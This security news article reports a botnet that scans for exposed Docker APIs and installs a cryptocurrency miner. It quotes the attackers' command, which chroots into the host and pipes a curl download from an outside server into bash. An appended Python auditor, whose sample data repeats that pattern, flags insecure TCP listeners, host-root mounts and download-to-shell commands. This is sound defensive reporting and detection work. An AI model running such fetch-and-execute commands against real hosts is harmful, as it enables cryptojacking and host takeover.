A group of hackers is currently mass-scanning the internet looking for Docker services whose API endpoints are exposed online.
The purpose of these scans is to let the group send commands to the exposed Docker instance and install a cryptocurrency miner on a firm's Docker hosts, generating funds for the group's own profit.
This mass-scanning campaign began over the past week and immediately stood out because of its sheer size.
“Consumers of the Bad Packets CTI API will notice that exploit activity aiming at Docker instances (exposed) happens quite often and is nothing new,” Troy Mursch, co-founder and chief research officer at Bad Packets LLC, told the media in an interview.
“What set this mission apart was the huge increment of scanning activity. This single-handedly warranted an additional probe to check out what this botnet was planning,” he said.
“As others have taken notice, this is not your average exploit attempt,” Mursch, who found out about the campaign, told the media. “There was a reasonable amount of effort placed into this campaign, and we have not entirely analyzed every single obsession it does as of yet.”
What we know so far is that the hackers are currently scanning over 59,000 netblocks (IP networks) looking for exposed Docker instances.
Once the hackers identify an exposed host, they use the API endpoint to start an Alpine Linux container, in which they run the following command:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'
The above command downloads and runs a Bash script from the attackers' server. The script installs a standard cryptocurrency miner (XMRig). In the two days the campaign has been live, the group has already mined 14.82 XMR, worth just over $740, Mursch said.
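The two conditions that make this campaign work are a Docker API reachable over plain TCP and a container that bind-mounts the host root filesystem and chroots into it. As an added example (not code from the article or from Bad Packets), the Python below audits a daemon.json and abridged `docker inspect` output for exactly that pattern; the sample config and container records are constructed, and the URL in the sample command is a placeholder.

```python
import json
import re

# Constructed daemon.json (assumed input): the "hosts" entry exposes the API on all
# interfaces over plain TCP, with no "tlsverify" set.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed, abridged `docker inspect` output: the first container mirrors the pattern
# in the article (Alpine image, host root at /mnt, chroot + curl piped to bash).
SAMPLE_INSPECT = json.dumps([
    {"Id": "aaa111", "Config": {"Image": "alpine:latest", "Cmd": [
        "/bin/sh", "-c", "chroot /mnt /bin/sh -c 'curl -sL4 http://example.invalid/x | bash;'"]},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
    {"Id": "bbb222", "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False}},
])

# A download tool whose output is piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")

def exposed_listeners(daemon_json: str) -> list[str]:
    """Return tcp:// entries from "hosts" when TLS client verification is not enabled."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify"):
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]

def host_root_binds(binds: list[str]) -> list[str]:
    """Bind mounts whose source is the host root filesystem, e.g. '/:/mnt'."""
    return [b for b in binds if b.split(":")[0] == "/"]

def suspicious_containers(inspect_json: str) -> list[dict]:
    """Flag containers that mount host root, run privileged, chroot into /mnt,
    or pipe a download into a shell; each finding lists the reasons."""
    findings = []
    for c in json.loads(inspect_json):
        cmd = " ".join(c["Config"].get("Cmd") or [])
        reasons = []
        if host_root_binds(c["HostConfig"].get("Binds") or []):
            reasons.append("host root bind-mounted")
        if c["HostConfig"].get("Privileged"):
            reasons.append("privileged")
        if "chroot /mnt" in cmd:
            reasons.append("chroot into host mount")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("download piped to shell")
        if reasons:
            findings.append({"id": c["Id"], "image": c["Config"]["Image"], "reasons": reasons})
    return findings
```

On a real host, feed `exposed_listeners` the contents of /etc/docker/daemon.json and `suspicious_containers` the output of `docker inspect $(docker ps -q)`; any tcp:// listener without TLS should be removed or put behind TLS client certificates.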